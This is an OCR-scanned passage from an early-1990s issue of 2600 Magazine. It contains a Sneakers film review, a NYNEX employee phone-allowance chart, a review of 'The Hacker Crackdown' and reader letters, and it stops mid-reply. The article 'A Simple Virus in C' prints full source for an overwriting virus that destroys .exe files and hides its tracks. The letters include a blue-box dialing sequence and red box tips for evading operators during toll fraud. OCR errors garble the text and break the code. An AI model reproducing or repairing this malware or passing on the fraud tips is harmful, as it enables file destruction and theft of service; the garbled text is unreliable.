  743.     References for this article include Noah Clayton's excellent piece on
  744. COCOTs in 2600 Magazine, Autumn 1990. Also The Plague's articlt, on Tone
  745. Dialer conversion to Red Box, 2600 Magazine, Summer 1990 (which inspired me to
  746. create the COMBO-BOX (red box plus DTMF dialer).
  747.  
  748.     Information is power... share it And drink massive amounts of Jolt Cola.
  749. Trust me, it's good for you. Keep the faith, and never stop searching for new
  750. frontiers. 
  751.  
  752.  
  753.  
  754.       ------------------------------------------------------------------
  755.  
  756.  
  757.                                 FILM REVIEW
  758.                                   Sneakers
  759.                              Universal Pictures
  760.  
  761. Starring:  Robert Redford, Ben Kingsley, Dan Akroyd, River Phoenix, James
  762.            Earl Jones, Sidney Poitier, David Strathairn, Mary McDonnell.
  763.  
  764. Review by Emmanuel Goldstein
  765.  
  766.     If there's one thing we can determine right off the bat, its that Sneakers
  767. is most deflniiely a fun film. But whether or not it is a hacker film is a
  768. topic open to debate. A good many of the characlers are hackers, or former
  769. hackers. And it is this skill which gives them the ability to do what they do:
  770. get into things they're not supposed to be able to get into. The difference is
  771. that these people do it for profit. And that fact alone is enough to make this
  772. a non-hacker movie. Afar all, hackers don't do what they do with profit in
  773. mind. But Sneakers is most definitely a film for hackers since there is so
  774. much in the way of technique that is illustrated.
  775.  
  776.      The opening scene is a flashback to the ideologically correct era of anti-
  777. war marches and draft card burnings. It's at that time that two hackers
  778. (complete with rotary phones and an acoustic coupler) get into some major
  779. trouble when they mess with Richard Nixon's bank account. The stage is set,
  780. the time shifts to the present, and one of the hackers turns into Robert
  781. Redford. He now runs a company that tests security, for a phenomenal fee.
  782. (Some of our friends who actually do this kind of thing tell us that the fee
  783. is absurdly low for that type of work.) His co-workers include a blind phone
  784. phreak who has remarkable perceptive powers, a hopeless paranoid who's
  785. convinced that everything is a plot of some kind, an ex-CIA agent who doesn't
  786. like to talk about why he left, and a kid who changed his grades by computer,
  787. no doubt after reading our Autumn 1989 issue. This mixed up bunch, played by a
  788. well-above-average cast, is fodder for unique situations and dialogue. And
  789. it's about time.
  790.  
  791.      The action centers around the group's quest for a magic box which can
  792. supposedly decrypt any encryption scheme. "There isn't a government in the
  793. world that wouldn't kill" for this kind of technology, they aptly surmise. The
  794. existenco of this magic box is the one truly silly element of Sneakers.
  795. Fortunately, the remaining technical issues contain only trivial flaws, such
  796. as lack of a delay on a multi-satellite phone call or the fact that everybody
  797. seems to use compatible equipment. We must recognize that Hollywood needs to
  798. take some liberties with reality.
  799.  
  800.     As the group continues its quest for the Holy Box, they become caught up
  801. in the whole FBI-CIA-NSA world. leaving the viewer with a less than
  802. satisfactory judgment of how the world of intelligence works. This was without
  803. doubt precisely the intention.
  804.  
  805.     In many ways, Sneakers is a political thriller and one which doesn't miss
  806. an opportunity to throw some political barbs. George Bush and the Republican
  807. Party are the favorite targets of this "culturally elitist" production. Again,
  808. it's about time. 
  809.  
  810.     But best of all is the fact that Sneakers at no point tries to send a moral
  811. message about hacking. Rather, hackers are looked upon as a reality; there are
  812. people who do this kind of thing and they have a useful place in society. With
  813. the kind of information being recorded these days, you need some of that
  814. hacking ability to be able to figure out what's really happening. True. this
  815. knowledge can be misused and distorted, as the film demonstrates. But that is
  816. human nature. If the good hackers were to disappear, only the evil ones would
  817. remain.
  818.  
  819.     Sneakers manages to send a serious message without taking itself too
  820. seriously. In fact, the confrontation between the NSA bigwig (James Earl
  821. Jones) and the group carrying the magic box is remarkably reminiscent of
  822. Dorothy and friends meeting the wizard after getting the Wicked Witch of the
  823. West's broomstick. A great man probably once said that the best way to send a
  824. serious message is through humor. Sneakers does this and still keeps the
  825. audience on the edge of their seats. 
  826.  
  827.  
  828.  
  829.       ------------------------------------------------------------------
  830.  
  831.  
  832.     People are always wondering whether or not telephone company employees get
  833. discounts on their phone bills. Well, we've discovered that NYNEX offers two
  834. classes of what is known as Telephone Service Allowance (TSA). This allowance
  835. can be used by NYNEX employees and their families for personal use as well as
  836. NYNEX business. Forbidden activities include other businesses or political
  837. campaign activities. The allowance only applies to the primary residence of
  838. the employee. Class A service provides a 100 percent allowance while Class B
  839. provides a 50 percent allowance. Those entitled to Class A status include
  840. management employees, nonmanagement employees with 30 years or more, retired
  841. employees on a service or disability pension, and employees with specified job
  842. functions, particularly those on call 24 hours a day. Those entitled to Class
  843. B generally include employees not eligible for Class A.
  844.  
  845.                                 CHART II
  846.                    TELEPHONE SERVICE ITEMS AND ALLOWANCE
  847. ------------------------------------------------------------------------------
  848.                                              New England        New York
  849.                                              Cls A    Cls B   Cls A   Cls B
  850. SERVICE ITEMS
  851. ------------------------------------------------------------------------------
  852.  
  853. Exchange Servlce
  854. Basic service, one main line, 3 outlet        100%     50%      100%      50%
  855. wires, wire investment, etc.)  Includes any
  856. IntraLATA toll option offered.
  857. ------------------------------------------------------------------------------
  858. Other Services
  859. Local Exchange Service Mileage                100%.    100%.    100%.     50%
  860. Touch Tone Service                            100%     100%     100%.     50%
  861. Customer Access Charge                        100%,    100%.    100%.     50%
  862. End User Originating Access (when approved)   100%.    100%.     --        --
  863. ------------------------------------------------------------------------------
  864. Custom Calling Features or Package
  865. Ca11 Malting                                  100%,    50%      100%       --
  866. Call Forwarding                               100%.    50%      100%       --
  867. Three-way Calling                             100%.    50%      100%       --
  868. Speed Calling-8 numbers                       100%.    50%      100%       --
  869. Speed Calling-30 numbers                      100%,    50%      100%       --
  870. ------------------------------------------------------------------------------
  871.                                  Charges
  872. (i.e. Install  line, change Service, install  100%     50%      100%      50%
  873. wire & Jacks, change grade of service or
  874. telephone number.)  Does not include station
  875. or other equipment.
  876. ------------------------------------------------------------------------------
  877. Toll Charges
  878. IntraLATA toll and credtt card calls (3),     100% up  50% of   100% up  50%
  879. additional local usage, IntraLATA directory   to $90/  up to    to $35/  (2)
  880. assistance, & temporary surcharges            qtr.     $60/mo.  mo.
  881. ------------------------------------------------------------------------------
  882. Directory Listings
  883. Change in listing                             100%     100%     100%     100%.
  884. Additional directory listings:
  885. Unrelated person-same house                    --       --       --       --
  886. 2 or more employees-same house                100%     100%.    100%     100%
  887. Relatives/dependents of employees-same house   50%      50%      --       --
  888. ------------------------------------------------------------------------------
  889. Notes:
  890. 1.   An empIoyee eligable for a CIass A Service allowance may have additional
  891. quantitiea of the items as well as Continuous Property Mileage (employee's
  892. property) at a 50% allowance with approval of his/her fifth level.
  893. 2.  Applies to local message units, IntraLATA directory assistance, and
  894. temporary surcharges only.
  895. 3.   IntraLATA charges are billed by the telephone company providing your
  896. service. InterLATA charges are billed by long distance companies (i.e.
  897. AT&T, MCI, GTE Sprint).
  898.  
  899.  
  900.  
  901.       ------------------------------------------------------------------
  902.  
  903.                           A Simple Virus in C
  904.                              by Infiltrator
  905.  
  906.     C seems to be the programming language of the 90's. Its versatility
  907. and ability for the same code to be used on different computer platforms
  908. are the reasons for this. So in a brief burst of programming energy I
  909. have created this little C virus. It's a basic overwriting virus that attacks
  910. all .exe files in the directories off the main C directory. The virus spreads
  911. itself by overwriting the virus code on top of the victim file. So the victim
  912. file becomes yet another copy of the virus. So as not to reinfect, the
  913. virus places a virus marker at the end of the victim file. Now I know that
  914. this is not the best coding and that it could be improved and refined but
  915. since I'm too lazy to do that you will just have to suffer.
  916.     Now the legal stuff: Please do not use this virus to do any harm or
  917. destruction, etc., etc. This virus is for educational use only and all that
  918. good stuff. Have fun!
  919.  
  920. /***************************************************************************
  921. *                                                                          *
  922. *   A note from your friendly OCR'r:  I HATE C.  If this were pascal, or   *
  923. *  even ASM, I could guarantee the accuracy of the following code, but     *
  924. *  since more than 5 minutes of anyone elses C source gives me migraines,  *
  925. *  I'd use the following code VERY carefully.  Better yet, use the HIGHLY  *
  926. *  accurate 2600 subscription dept. address in this file, and you can      *
  927. *  proceed with your mayhem in relative safety...                          *
  928. ***************************************************************************/
  929.  
  930.  
  931.                 /* THE SIMPLE OVERWRITING VIRUS */
  932.                 /*   CREATED BY INFILTRATOR        */
  933. #include "stdio.h"
  934. #include "dir.h"
  935. #include "io.h"
  936. #include "dos.h"
  937. #include "fcntl.h"
  938. /********** VARIABLES FOR THE VIRUS **********/
  939. struct ffblk ffblk, ffblk1 ,ffblk2;
  940. struct ftime ft;
  941. int done,done1 ,lfof,marker=248,count=0,vsize=19520,drive;
  942. FILE *victim,*virus,*lf;
  943. char ch,vc,buffer[MAXPATH],vstamp[23]="HAPPY, HAPPY! JOY,JOY! ";
  944. struct ftime getdt();/*               */
  945. setdt();             /* Function prototypes
  946. dna(int argc, char *argv[]);/*               ---- */
  947. /********** MAIN FUNCTION (LOOP) **********/
  948. void main(int argc, char *argv[])     /* Start of main loop */
  949. {
  950.     dna(argc,argv);           /* Call virus reproduction func */
  951.     getcwd(buffer, MAXPATH);/* Get current directory */
  952.     drive -- getdisk();       /* Get current drive number */
  953.     setdisk(2);                         /* Goto 'C' drive */
  954.                             /* Change to root directory */
  955.     donel= findfirst(" *",&ffblkl,FA_DIREC);/* Get 1 st directory */
  956.     while(!done1) {            /* Start of loop */
  957.     chdirfffblk1 .ff_name);    /* Change to directory */
  958.     if (If = findfirst("*.exe",&ffblk2,0) == -1 ) {/*No file to infect */
  959.                                 /* Back to root */
  960.         donel=findnext(&ffblkl);   /* Get next dir */
  961.  
  962.     }
  963.     else (                  /* Yes, infectable file found */
  964.             dna(argc,argv);     /* Call reproduction func. */
  965.                                    /* Back to root */
  966.             donel=findnext(&ffblkl);/* Next directory */
  967.     }
  968.     }                              /* End loop */
  969.     setdisk(drive);         /* Goto original drive */
  970.     chdir(buffer);          /* Goto original dir */
  971.     }                              /* End of virus */
  972. /********** END OF MAIN FUNCTION, START OF OTHER FUNCTIONS **********/
  973. dna(int argc, char *argv[])   /* Virus Tasks Func */
  974. {
  975.       Ifof = findfirst("*.exe",&ffblk, 0);/* Find first '.exe' file */
  976.       while(!done)
  977.       {
  978.     victim=fopen(ffblk,ff_name,"rb+");  /* Open file */
  979.     fseek(victim,-1,SEEK_END);/* Go to end, look for marker */
  980.       ch=getc(victim);       /* Get char */
  981.                              /* Is it the marker? YES */
  982.       {
  983.     fclose(victim);          /* Don't Reinfect */
  984.         done=findnext(&ffblk);/* Go to next '.exe' file */
  985.     }
  986.     else                            /* NO...Infect! */
  987.         {
  988.         getdt();                   /* Get file date */
  989.         virus=fopen(argvi()],"rb");/* Open host program */
  990.         victim=fopen(ffblk,ff_name,"wb" );/* Open file to infect */
  991.         while ( count ( vsize )/* Copy virus code */
  992.         {                        /* to the victim file */
  993.                vc=getc(virus);/* This will ovenNrite */
  994.                putc(vc,victim);/* the file totally */
  995.                count++;    /* End reproduction */
  996.         }
  997.         fprintf(victim,"%s",vstamp);/* Put on virus stamp, optional */
  998.         fclose(virus);     /* Close Virus */
  999.         fclose(victim);    /* Close Victim */
  1000.         victim=fopen(ffblk, ff_name,"ab");   /* Append to victim */
  1001.         putc(marker,victim);         /* virus marker char */
  1002.         fclose(victim);        /* Close file */
  1003.         setdt();                /* Set file date to original */,
  1004.         count=0;               /* Reset file char counter */
  1005.         done=findnext(&ffblk); /* Next file */
  1006.         }
  1007.     }
  1008. }
  1009. struct ftime getdt()           /* Get original file date func */
  1010. {
  1011.       victim=fopen(ffblk,ff_name,"rb");/* Open file */
  1012.       getftime(fileno(victim), &ft);  /* Get date */
  1013.       fclose(victim);                 /* Close file */
  1014.       return ft;                      /* Return */
  1015.  
  1016. }
  1017. setdt()                                  /* Set date to original func *l
  1018. {
  1019.         victim=fopen(ffblk,ff_name,"rb");                 I* Open file *l
  1020.         setftime(fileno(victim), &ft);                    /* Set date */
  1021.         fclose(victim);                                   /* Close file */
  1022.         return ();                                         /* Return */
  1023. }
  1024.  
  1025.  
  1026.       ------------------------------------------------------------------
  1027.  
  1028.  
  1029.                                 BOOK REVIEW
  1030.  
  1031. Hacker Crackdown: Law and Disorder on the Electronic Frontier
  1032. by Bruce Sterling
  1033. $23.00, Bantam Books, 313 pages
  1034. Review by The Devil's Advocate
  1035.  
  1036.     The denizens of cyberspace have long revered Bruce Sterling as one of
  1037. cyberfiction's earliest pioneers. Now, Sterling has removed his steel-edged
  1038. mirrorshades to cast a deep probing look into the heart of our modern-day
  1039. electronic frontier. The result is The Hacker Crackdown, the latest account of
  1040. the hacker culture and Sterling's first foray into non-fiction.
  1041.  
  1042.     At first glance, Crackdown would appear to follow in the narrative
  1043. footsteps of The Cuckoo's Egg and Cyberpunk. The setting is cyberspace, 1990:
  1044. year of the AT&T crash and the aftermath of Ma Bell's fragmentation; year of
  1045. Operation Sundevil, the Atlanta raids, and the Legion of Doom breakup; year of
  1046. the E911 document and the trial of Knight Lightning; year of the hacker
  1047. crackdown, and the formation of that bastion of computer civil liberties, the
  1048. Electronic Frontier Foundation. Unlike Cuckoo and Cyberpunk, however, Sterling's
  1049. work does not center around characters and events so much as the parallels
  1050. he draws between them. Crackdown is far less story and far more analysis.
  1051. Crackdown is also personal. Missing is the detached and unbiased aloofness
  1052. expected of a journalist. Intermingled with the factual accounts, for
  1053. instance, are Sterling's keen wit and insight:
  1054.  
  1055.     "In my opinion, any teenager enthralled by computers, fascinated by the
  1056. ins and outs of computer security, and attracted by the lure of specialized
  1057. forms of knowledge and power, would do well to forget all about hacking and
  1058. set his (or her) sights on becoming a Fed. Feds can trump hackers at almost
  1059. every single thing hackers do, including gathering intelligence, undercover
  1060. disguise, trashing, phone-tapping, building dossiers, networking, and
  1061. infiltrating computer systems...."
  1062.  
  1063.     Sterling is fair. He effectively gets into the psyche of hacker and
  1064. enforcer alike, oftentimes poking fun at the absurdity in both lines of
  1065. reasoning. To hackers he is honest and brutal: "Phone phreaks pick on the
  1066. weak." Before the advent of ANI, hackers exploited AT&T. Then they drifted to
  1067. the Baby Bells where security was less than stellar. From there it was a
  1068. gradual regression all the way down to local PBX's, the weakest kids on the
  1069. block,  and  certainly  not  the megacorporate entities that give rise to
  1070. "steal from the rich" Robin Hood excuses. To enforcers he is equally brutal,
  1071. charting a chronicle of civil liberty abuses by the FBI, Secret Service, and
  1072. local law enforcement agencies.
  1073.  
  1074.     Perhaps the best reason to read Crackdown is to learn what other books
  1075. have neglected to focus on: the abuses of power by law enforcement. Indeed, it
  1076. is these abuses that are the main focus of Sterling's work. One by one he
  1077. gives a grim account of the raids of 1990, the Crackdown or cultural genocide
  1078. that was to have as its goal the complete and absolute extinction of hacking
  1079. in all of its manifestations.
  1080.  
  1081.     On February 21, 1990, Robert Izenberg was raided by the Secret Service.
  1082. They shut down his UUCP site, seized twenty thousand dollars' worth of
  1083. professional equipment as "evidence," including some 140 megabytes of files,
  1084. mail, and data belonging to himself and his users. Izenberg was neither
  1085. arrested nor charged with any crime. Two years later he would still be trying
  1086. to get his equipment back.
  1087.  
  1088.     On March 1, 1990, twenty-one-year- old Erlk Bloodaxe was awakened by a
  1089. revolver pointed at his head. Secret Service agents seized everything even
  1090. remotely electronic, including his telephone. Bloodaxe was neither arrested
  1091. nor charged with any crime. Two years later he would still be wondering where
  1092. all his equipment went.
  1093.  
  1094.     Mentor was yet another victim of the Crackdown. Secret Service agents
  1095. "rousted him and his wife from bed in their underwear," and proceeded to seize
  1096. thousands of dollars' worth of work- related computer equipment, including his
  1097. wife's incomplete academic thesis stored on a hard disk. Two years later and
  1098. Mentor would still be waiting for the return of his equipment.
  1099.  
  1100.     Then came the infamous Steve Jackson Games raid. Again, no one was
  1101. arrested and no charges were filed. "Everything appropriated was officially
  1102. kept as 'evidence' of crimes never specified."
  1103.  
  1104.     Bruce Sterling explains (in an unusual first-person shift in the
  1105. narrative) that it was this raid above all else which compelled him to "put
  1106. science fiction aside until l had discovered what had happened and where this
  1107. trouble had come from."
  1108.  
  1109.     Crackdown culminates with what is perhaps the most stunning example of
  1110. injustice outside of the Steve Jackson raid. Although the trial of Knight
  1111. Lightning is over, its bittersweet memories still linger in the collective
  1112. mind of cyberspace. This, after all, was the trial in which William Cook
  1113. maliciously tried (and failed) to convict a fledgling teenage journalist for
  1114. printing a worthless garble of bureaucratic dreck by claiming that it was in
  1115. fact a $79,449 piece of "proprietary" code. In an effort to demonstrate the
  1116. sheer boredom and tediousness of the E911 document, and the absurdity of
  1117. Cook's prosecution, Crackdown includes a hefty sampling of this document (at a
  1118. savings of over $79,449 by Cook's standardsl).
  1119.  
  1120.     More than any other book to date, Crackdown concentrates on the political
  1121. grit and grime of computer law enforcement, answering such perennial favorites
  1122. as why does the Secret Service have anything to do with hackers anyway? In
  1123. Crackdown we learn that something of a contest exists between the Secret
  1124. Service and the FBI when it comes to busting hackers. Also touched upon are
  1125. the "waffling" First Amendment issues that have sprung forth from cyberspace.
  1126.  
  1127.     Crackdown is a year in the life of the electronic frontier. For some, a
  1128. forgotten mote of antiquity; for others, a spectral preamble of darker things
  1129. to come. But for those who thrive at the cutting edge of cyberspace,
  1130. Crackdown is certain to bridge those distant points of light with its account
  1131. of a year that will not be forgotten.
  1132.  
  1133.  
  1134.  
  1135.       ------------------------------------------------------------------
  1136.  
  1137.  
  1138.                                   I/O
  1139.  
  1140. Blue Box Questions
  1141. Dear 2600:
  1142.     A while ago I ordered a book called Spy Game. I was reading about the
  1143. phone company and came across a column about you. I would like to access
  1144. different operators for different info needs and I was wondering how exactly to
  1145. access them. I want to know how to achieve a Key Pulse tone, a STart tone,
  1146. number 11, 12, and KP2. I also want to know if I went to Radio Shack and
  1147. bought their 15 dollar phone dialer, if I would be able to get a repair shop
  1148. to modify it so it can achieve these tones?
  1149.                 MD
  1150.                 Sheboygan, WI
  1151.  
  1152.     Experimentation is really the only way to discover such things since
  1153.     there's so much variation between regions. The blue box frequencies have
  1154.     been published several times in 2600, most recently in the Summer 1992
  1155.     issue. You're much better off with a genuine blue box or demon dialer
  1156.     rather than trying to modify a phone dialer for that purpose.
  1157.  
  1158.  
  1159. Dear 2600:
  1160.     Quite a few publications on the subject of blue boxing reached the Dutch
  1161. press last year. The Dutch hacker magazine Hack-Tic printed out a complete
  1162. set of instructions for using the CCITF-4 and -5 systems on international
  1163. telephone lines. Most newspapers covered the issue as well and even one radio
  1164. program is said to have broadcast a complete CCITT-5 sequence, which gave an
  1165. international telephone connection to the secretary of Mr. Bush for free.
  1166.  
  1167.     After several attempts (and a sky-high telephone bill), I somehow managed
  1168. to program my Mac to do the same job (i.e. generating DTMF and C-5 tones).
  1169. Because Dutch telephone authorities limited C-5 (C-4 has gone already) on free
  1170. international lines, using this system has become a real task.
  1171.  
  1172.     But the point I want to make here is that most people only try to reach a
  1173. so-called transit international telephone exchange. At this point in their
  1174. connection, they disconnect by using the Clear Forward signal. With Seize and
  1175. KP2 they will be able to dial almost any country in the world. But what
  1176. happens if they get stuck in a non-transit exchange? KP2 will not be accepted,
  1177. so only local (i.e. in that specific country) calls can be set up. 
  1178.  
  1179.     I discovered that you can sometimes get back to the outgoing international
  1180. network by using KP1 which is indeed the local differentiator. The idea is to
  1181. let the national network of your (temporary) destination make the outgoing
  1182. connection. For instance, by using Seize-KP1 -00151247409 36-END on the lines
  1183. from the Netherlands to Iceland (landcode 354), connection will be made to the
  1184. still non-suped musac line published in 2600 in May 1985. The first
  1185. intemational lines (i.e. to the USA). Almost the same goes for the Solomon
  1186. Isles (landcode 677), only an extra zero is needed here (notice the relaying
  1187. in Solomon's telephone network, which sounds really beautiful). 
  1188.  
  1189.     Note that in most countries this scheme does not seem to work. Just see it
  1190. as an extension of your phreaking tools.
  1191.                 Phrankenstel.
  1192.  
  1193.     The trick used from the Netherlands involved dialing Iceland Direct
  1194.     (060220354), sending a Clear Forward, Seize, and a KPI (to indicate a
  1195.     terminal call or domestic call), 0 (to incHcate a normal call), then 0
  1196.     followed by the country code and number. That trick no longer works.
  1197.  
  1198.  
  1199. Assorted Comments
  1200. Dear 2600:
  1201.     I attended the Winter '92 Consumer Electronic Show in Las Vegas from
  1202. January 9-12 and saw few interesting new products. Although there were about
  1203. 15,000 exhibits, there were maybe 1,000 computer related exhibits, and the
  1204. majority of those were power supply protection devices. I did see some
  1205. interesting computer security products. Some companies were pushing their
  1206. Caller ID devices and software. One software Caller ID system which was run on
  1207. an IBM compatible would pull up all the caller's pertinent information (name,
  1208. address, etc.) and digitized photo (if available) from a database for display
  1209. on the scneen (VIVE Synergies Inc., 30 West Beaver Creek Road, Unit 2,
  1210. Richmond Hill, Ontario L4B 3K1, Canada, phone (416) 882-6107). I also saw a
  1211. couple of regular Caller ID boxes and an integrated Caller ID phone with
  1212. speakerphone and memory dial and a 15 call digit incoming number memory
  1213. (SysPerfect Electronics of San Francisco, phone (415) 875-3550).
  1214.  
  1215.     One product I saw was designed to solve the problem concerning lack of
  1216. privacy on cellular phone calls for any phone call where security was a
  1217. concern. The Privacom P-25-C is a portable device which scrambles the audio
  1218. signal from your cellular or regular phone line to be descrambled by the same
  1219. device on the called end. The device offers 25 different scrambling codes
  1220. (which I see as pretty inadequate). To operate, the user dials his phone
  1221. normally. When the call is made and verification with the called party is
  1222. confirmed, a code is chosen and both parties place their receivers onto the
  1223. coupler of the device and pick up its handset. Conversation then continues
  1224. normally, all audio being scrambled before being sent over the line (or
  1225. through the air in the case of cellular phones). The device itself takes about
  1226. as much room as a portable cellular phone and runs continuously up to 20 hours
  1227. on battery power. (Swift Strike, Inc., PO Box 206, Galion, OH 44833, phone
  1228. (419) 468-1560. Additional sales and technical information: Addtel
  1229. Communications, (615) 622-8981 or 800-553-6870) 
  1230.  
  1231.     I went and visited the clowns at the Prodigy booth. I wouldn't have even
  1232. bothered but I felt this uncontrollable urge to confront them with the
  1233. allegations made against them concerning the Prodigy software scanning a user's
  1234. hard drive in search of address information for mailing purposes. Armed with
  1235. the inside knowledge out of the Autumn 1991 issue of 2600 that described how
  1236. Prodigy junk mail was received at a company addressed to non-existent
  1237. "people", I began to explain to them how the theory of their little invasion of
  1238. privacy seam was validated beyond reasonable doubt. They got pissed! "We never
  1239. did that," said one spokeswoman. "Do you believe everything you read?" asked
  1240. another, quite agitated spokesman. I walked off, leaving them there in their
  1241. angry and flustered state of loathing. Looking back I noticed them leering at
  1242. me. Every time after that when I walked by them they were still leering at me.
  1243. One must wonder, if they are so innocent of this accusation, why they became
  1244. so defensive rather than explain it away with amiable business tact. At any
  1245. rate, I had a good laugh making them squirm.
  1246.  
  1247.     In the Summer 1991 issue, TN wrote in telling of a way to place local calls
  1248. using the Radio Shack Tone Dialer Red Box, saying "I have found [it] to work
  1249. and have tested/it] all over Califomia." Apparently you did not travel very
  1250. far in your testing because it does not work in my area of Northern Califomia
  1251. (916 area code). While on the subject of the Red Box, recently a friend was
  1252. using it to call Hong Kong and encountered some interesting AT&T operator
  1253. shenanigans. Basically, by now it would be more than safe to conclude that
  1254. every phone company in the United States is aware of the Radio Shack Tone
  1255. Dialer conversion. AT&T must have some memo circulating stating proper
  1256. procedure for detecting and halting Red Box toll fraud. On one occasion, the
  1257. operator told my friend he was experiencing computer problems. He asked him to
  1258. insert 85 cents (my friend signalled four quarters with his Red Box) and then
  1259. claimed that it was not being received by his computer so he was going to
  1260. return it. My friend played along and told the operator he had received the
  1261. money back, although by that time he had realized he had not heard the
  1262. operator release signal nor the tell-tale click inside the phone of the hopper
  1263. relay. The operator asked him to insert the money again, which my friend did,
  1264. and then claimed, once again, to have retumed it, and asked my friend if he
  1265. got the money. This time, my friend said no, so the operator attempted again,
  1266. this time for real. My friend heard the operator release signal and a click
  1267. inside the payphone, and claimed he had gotten his coins back. "I'm going to
  1268. be polite about this," said the AT&T operator. "You have this little black box
  1269. with you that makes these sounds...." he continued. My friend didn't bother to
  1270. hear him out and simply hung up, which he regrets because who knows what he
  1271. may have learned. My friend said of the eight or so operators he dealt with
  1272. that night, three of them caught on to the Red Box. We must now ask ourselves
  1273. why. The answer doesn't require hours of study and research, as is painfully
  1274. obvious: the thing is too damn loud and too damn consistent. Also, it doesn't
  1275. help that the timing of the Red Box tones is off by a couple of milliseconds.
  1276. My suggestion? Place a bank card or credit card over the mouthpiece of the
  1277. phone to mute the volume of the tones to where they aren't so blatantly phony.
  1278. After all, the actual quarter tones as generated by the AT&T long distance
  1279. computers are barely audible themselves. Also, it wouldn't hurt to program
  1280. only one quarter in your priority memory and pound them out at inconsistent
  1281. intervals. Mind you, these suggestions are only necessary when dealing with
  1282. live operators as the long distance computers are far friendlier, which is
  1283. kind of scary when you think about it. Computers friendlier than live people.
  1284. If they didn't rely so heavily on their damned computers, they'd have the
  1285. current Red Box fad beat. But no, as it is, computers are infinitely more wise
  1286. than humans, so it continues. Yes, we live in a sad world. Oh well.
  1287.                 DC
  1288.  
  1289.  
  1290. Sheer Frustration
  1291. Dear 2600:
  1292.     I have entitled the following Modern Times - A Drama in Too Many Acts.
  1293.  
  1294.     1st Act: Reading the 2600 Magazine of Autumn 1991 I found on page 26 a
  1295. letter from GS, Seattle: "Bellcore has a new publications listing. The Catalog
  1296. of Technical Information." With one eye on the mag and one on the phone I
  1297. dialed the 800 number given. But the only thing I heard was a German tape
  1298. telling me to check the number or call the operator. Oh no! These are the
  1299. Nineties, the Digital Decade!
  1300.  
  1301.     2nd Act: I finally called the operator and explained my problem. "What? I
  1302. can't believe that. You can dial every number directly!" was the answer.
  1303. Insisting on my not being deaf and dumb, I gave the number to her. "Okay, I'll
  1304. try it for you. But that will cost extra! Stay at your phone, I'll call you
  1305. back." 
  1306.  
  1307.     3rd Act: Some minutes later my phone rang. Operator: "I can't get
  1308. through... sorry. You may call the Intemational Telephone Number Information
  1309. for a local number." What a concept, not knowing the address or even the city!
  1310.  
  1311.     4th Act: A quick look at my private "Toll-free Telephone Number Database"
  1312. revealed an AT&T USA Direct connection to an operator in the States. Not very
  1313. hopefully I dialed the number and bingo! He wouldn't do a damned thing for me
  1314. without having an AT&T Calling Card! 
  1315.  
  1316.     5th Act: Eventually I found the toll-free number from Germany to AT&T in
  1317. Kansas City. The nice lady told me that there are no AT&T offices in Germany
  1318. (why are they placing their ads here all the time?) and that I need a Visa Card
  1319. to get a Calling Card. 
  1320.  
  1321.     6th Act: Still not ready for surrender, I tried to get a local number.
  1322. For the needed address I wanted to call "Telename of Springfield, VA (same
  1323. issue, page 31). You surely can imagine what happened: "Your call cannot be
  1324. completed as dialed...." The Telename numbcr is a 900 number!
  1325.  
  1326.     7th Act: I sent a fax (this one) to 2600 Magazine, asking for help. So
  1327. please print a local telephone number for Bellcore in your next issue, or at
  1328. least an address. Thank you. 
  1329.                 Germany
  1330.  
  1331.     The number in question, 800-521-2673, translates to 908-699-5800 or 908-699-
  1332.     5802. We'll try to print translations in the future.
  1333.  
  1334. Mild Encryption
  1335. Dear 2600:.
  1336.     I just purchased one of the Motorola cordless (not cellular) phones which
  1337. is manketed as having "secure clear" - a method of mild grade voice
  1338. ecncryption of the radio portion.
  1339.  
  1340.     Some friends and I listened in with our receivers and the audio is indeed
  1341. extremely difficult for casual monitoring. It would, however, be trivial for
  1342. any serious agency or corporate type to break through, but then again those
  1343. are the people who'd be doing other things as well. 
  1344.  
  1345.     In short, it does provide moderate levels of security. In effect, you're
  1346. getting "wire grade" pmtection over a condless link.
  1347.  
  1348.     The price is quite a bit high - about $200-$250, depending on store,
  1349. features, etc.
  1350.                 Danny
  1351.                 New York
  1352.  
  1353. Cable Hacking
  1354. Dear 2600:
  1355.     I've hacked my way through the phone system, computers attached to modems,
  1356. locks, etc. Now I'm interested in the cable company. Manhattan Cable in
  1357. particular. How do those addressable converter boxes work, anyhow? How does the
  1358. central office turn on pay-per-view for my box? Has anyone hacked this system
  1359. and, if so, can you please publish some info so I don't have to redo all the
  1360. work?  My interest is purely in hacking to understand and learn, not to steal
  1361. service!
  1362.                 Lawrence
  1363.                 NYC
  1364.  
  1365. Dear 2600:
  1366.     I am a subscriber and really enjoy your magazine. I especially love your
  1367. do-it-yourself Radio Shack projects. I have a request for one of your upcoming
  1368. issues. I was wondering if you could put in some instructions and schematics
  1369. on how to cheaply build a Cable TV pay channel "descrsmbler". 
  1370.                 Anonymous
  1371.  
  1372.  
  1373.     Future writers: this is what the people want!
  1374.  
  1375. A Phone Mystery
  1376. Dear 2600:
  1377.     I just started reading your wonderful periodical two issues ago. I saw
  1378. your Autumn 1991 issue at a local bookstore here in town. I picked up the
  1379. magazine and was very excited. You see, l have been BBSing for a few years
  1380. now, and have always been interested in everything you guys cover. 
  1381.  
  1382.     I've got a story. My father used to use my current bedroom when I was
  1383. little as his office. When he moved into a real office he had the separate
  1384. line for the room disconnected. Soon after, I moved into the room. I didn't
  1385. pay much attention to the outlet in my room because I thought it was just
  1386. hooked up to the main house line. About eleven years after we got the line
  1387. disconnected, I decided to see if it worked. I called a friend and was
  1388. excited. I thought to myself I could now have a phone in my room. I then
  1389. called my house line and it wasn't busy. My mother picked up the line and we
  1390. talked for a while. 
  1391.  
  1392.     From what I could tell, Ma Bell just forgot to unplug the line and never
  1393. charged us for it. This was all before I knew any better and before I got into
  1394. hacking. 
  1395.  
  1396.     Then one day I picked up the phone to call a friend and there was a guy on
  1397. the line. I didn't say anything until I think he said something to the effect
  1398. of "Jeff, is that you?"     replied back that I wasn't Jeff and hung up. I was
  1399. kinda scared to use the line for a while, but a few weeks later I really had
  1400. to get ahold of somebody and my sister was on the house line. I picked up the
  1401. phone in my room and there was that same guy on it. I never got a chance to
  1402. use the line again because a few months later my parents gave me a phone line
  1403. for me to use in my room. When the new line was all hooked up the old line
  1404. wouldn't work. I didn't think about it all that much until recently.
  1405.  
  1406.     My question is, does this happen a lot? I mean is Ma Bell really so big
  1407. that they can forget about a line for over a decade? If I was older, or if I
  1408. knew any better, I could have really raised some major hell.
  1409.                 The Psychedellc Sloth
  1410.                 Oregon
  1411.  
  1412.     This kind of thing happens all the time. In fact, odds are if you move
  1413.     into a new house and plug in a phone, you'll be connected to someone else's
  1414.     line. That is what happened to you. Your old line was disconnected. The
